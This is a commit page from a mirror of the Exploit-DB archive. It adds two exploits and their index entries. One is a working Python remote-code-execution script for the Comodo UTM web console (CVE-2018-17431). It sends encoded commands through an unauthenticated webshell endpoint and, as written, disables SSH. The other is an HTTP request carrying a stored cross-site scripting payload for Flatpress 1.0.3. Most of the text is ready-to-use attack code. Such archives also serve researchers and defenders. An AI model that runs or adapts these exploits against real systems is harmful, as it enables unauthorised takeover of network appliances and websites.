bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-09-23

Browse source 
2 changes to exploits/shellcodes

Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
This commit is contained in:
Offensive Security 2020-09-23 05:02:05 +00:00
parent 87f49d4427
commit 1a8b74a305
3 changed files with 86 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

50
exploits/multiple/webapps/48825.py Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8
import requests
def RndInt(Lenght):
from random import choice
from string import digits
RandonInt = ''.join([choice(digits) for n in range(Lenght)])
return str(RandonInt)
if __name__ == "__main__":
IP = input("IP: ")
Port = input("Port: ")
Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
'''For more info about command try to read manual of spesefic version of Comodo UTM and
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
'''
BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
BaseNComdURL = BaseURL + "&k=" + Command
LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
FullURL = BaseNComdURL + LastPart
AddetionalEnter = BaseURL + "&k=%0a" + LastPart
try:
FirstResponse = requests.get(FullURL).text
except:
print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
exit(1)
SecondResponse = requests.get(AddetionalEnter).text
if SecondResponse.find("Configuration has been altered") == -1:
print("\nExploit Failed!\n")
exit(1)
else:
print("\nOK! Command Ran!\n")
exit(0)

34
exploits/php/webapps/48826.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
# Google Dork: -
# Date: 2020-09-19
# Exploit Author: Alperen Ergel
# Vendor Homepage: https://www.flatpress.org/
# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
# Version: 1.0.3
# Tested on: windows 10 / xampp
# CVE : -
# Proof Of Content
POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Origin: http://localhost/
Connection: close
Referer: http://localhost/flatpress/admin.php?p=entry&action=write
Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
Upgrade-Insecure-Requests: 1
_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS&timestamp=1600526382&
entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue
# Snipp
content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>

2
files_exploits.csv
View file

@ -40649,6 +40649,8 @@ id,file,description,date,author,type,platform,port
48822,exploits/php/webapps/48822.txt,"Seat Reservation System 1.0 - 'id' SQL Injection",2020-09-21,Augkim,webapps,php, 48822,exploits/php/webapps/48822.txt,"Seat Reservation System 1.0 - 'id' SQL Injection",2020-09-21,Augkim,webapps,php,
48823,exploits/hardware/webapps/48823.py,"Mida eFramework 2.9.0 - Back Door Access",2020-09-21,elbae,webapps,hardware, 48823,exploits/hardware/webapps/48823.py,"Mida eFramework 2.9.0 - Back Door Access",2020-09-21,elbae,webapps,hardware,
48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple, 48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple,
48825,exploits/multiple/webapps/48825.py,"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution",2020-09-22,"Milad Fadavvi",webapps,multiple,
48826,exploits/php/webapps/48826.txt,"Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting",2020-09-22,"Alperen Ergel",webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.